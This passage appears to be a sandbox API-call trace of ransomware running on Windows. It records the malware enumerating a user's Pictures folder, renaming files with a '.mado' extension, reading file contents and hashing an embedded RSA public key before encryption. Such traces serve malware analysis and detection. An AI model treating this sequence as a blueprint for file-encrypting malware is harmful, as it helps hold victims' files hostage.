lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.058] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.058] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.058] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.058] CloseHandle (hObject=0x63c) returned 1 [0206.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bec8 [0206.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x3b7b950 [0206.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0206.059] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\s9Sudl4JhdBUS2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\s9sudl4jhdbus2.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\s9Sudl4JhdBUS2.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\s9sudl4jhdbus2.jpg.mado")) returned 1 [0206.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.060] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.061] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c058e60, ftCreationTime.dwHighDateTime=0x1d5db15, ftLastAccessTime.dwLowDateTime=0x85219a20, ftLastAccessTime.dwHighDateTime=0x1d5e5b9, ftLastWriteTime.dwLowDateTime=0x85219a20, ftLastWriteTime.dwHighDateTime=0x1d5e5b9, nFileSizeHigh=0x0, nFileSizeLow=0x1097f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WDodq.gif", cAlternateFileName="")) returned 1 [0206.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0206.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\WDodq.gif") returned=".gif" [0206.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\WDodq.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\wdodq.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.061] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67967) returned 1 [0206.061] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.064] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10959, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.064] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.065] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.065] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1097f, lpOverlapped=0x0) returned 1 [0206.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.066] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0206.067] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.067] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.067] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.067] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.067] GetLastError () returned 0x0 [0206.067] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.067] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0206.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.067] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.067] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.067] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10980) returned 0x3b81690 [0206.068] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66d68 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a10 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66db0 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.068] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79a40 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79a28 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72db0 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72ec8 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.070] GetCurrentThreadId () returned 0x600 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff358 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.070] GetCurrentThreadId () returned 0x600 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79aa0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72db0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79aa0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72b80 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66db0 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 